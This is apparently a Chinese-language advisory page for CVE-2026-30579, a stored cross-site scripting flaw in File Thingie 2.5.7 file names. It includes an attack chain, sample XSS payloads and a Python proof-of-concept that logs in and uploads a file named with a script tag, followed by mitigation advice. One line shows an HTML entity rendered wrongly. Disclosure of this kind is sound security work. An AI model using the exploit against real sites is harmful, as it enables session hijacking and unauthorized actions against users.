CVE-2026-30579 CVSS 6.5 中危

CVE-2026-30579 File Thingie 存储型XSS漏洞

披露日期: 2026-03-20

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-30579

漏洞类型

跨站脚本攻击 (XSS)

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

File Thingie

漏洞概述

File Thingie 2.5.7版本被发现存在跨站脚本攻击（XSS）漏洞。该漏洞主要由于软件在处理文件上传请求时，未能对用户提交的文件名参数进行有效的安全过滤和转义。攻击者可利用低权限账户上传文件，并将恶意JavaScript代码注入到文件名中。当管理员或其他用户浏览文件列表时，恶意脚本将在其浏览器中自动执行，从而窃取敏感信息或执行未授权操作。

技术细节

该漏洞的根源在于File Thingie应用程序在输出渲染层面的安全缺失。当用户上传文件时，服务器端脚本接收文件名并存储它，但在将文件名显示在Web页面的HTML源码中时，未应用HTML实体编码（如将`<`转换为`<`）。攻击者可以构造一个包含XSS Payload（例如`<img src=x onerror=print(1)>`）的特殊文件名。由于CVSS向量包含PR:L，攻击者至少需要一个低权限用户账户。上传成功后，Payload被持久化存储在服务器文件系统或数据库中。当任何具有访问权限的用户（特别是管理员）打开文件管理界面查看文件列表时，浏览器会解析包含Payload的HTML节点，导致恶意JavaScript代码在受害者上下文中执行。这可能导致Cookie窃取、会话劫持或进一步的客户端攻击。

攻击链分析

STEP 1

侦察与访问

攻击者发现目标运行File Thingie 2.5.7，并获取或注册一个低权限用户账户（PR:L）。

STEP 2

构造载荷

攻击者编写包含恶意JavaScript代码的特制文件名，例如`<img src=x onerror=alert(1)>`。

STEP 3

上传文件

攻击者利用“文件上传”功能，将文件名设置为恶意载荷并上传文件。服务器端未过滤直接存储。

STEP 4

触发漏洞

管理员或其他用户访问文件管理页面查看文件列表。页面渲染文件名时，浏览器解析并执行恶意脚本。

STEP 5

执行攻击

恶意脚本在受害者浏览器上下文中运行，窃取Cookie或执行进一步操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://example.com/filethingie/ft2.php"

# Attacker credentials (Low privilege required)
username = "attacker"
password = "password"

# Malicious filename containing XSS payload
# The application reflects the filename directly in the UI
malicious_filename = "<script>alert('CVE-2026-30579_XSS');</script>.txt"

# Create a session to handle cookies
session = requests.Session()

# 1. Login to get a valid session
login_data = {
    "username": username,
    "password": password,
    "submit": "Login"
}
session.post(target_url, data=login_data)

# 2. Prepare file upload
# The filename is where the injection happens
files = {
    'file': (malicious_filename, b'Content of the file', 'text/plain')
}
upload_data = {
    'action': 'upload',
    'submit': 'Upload'
}

# 3. Send the malicious request
response = session.post(target_url, files=files, data=upload_data)

if response.status_code == 200:
    print("[+] Potential upload successful.")
    print("[+] Check the file list page to trigger the XSS.")
else:
    print("[-] Upload failed.")

影响范围

File Thingie 2.5.7

防御指南

临时缓解措施

建议管理员暂时限制文件上传权限，或在浏览器端禁用JavaScript以防止恶意脚本执行，直到应用官方补丁。同时，部署Web应用防火墙（WAF）规则以拦截包含常见XSS脚本标签的文件名上传请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表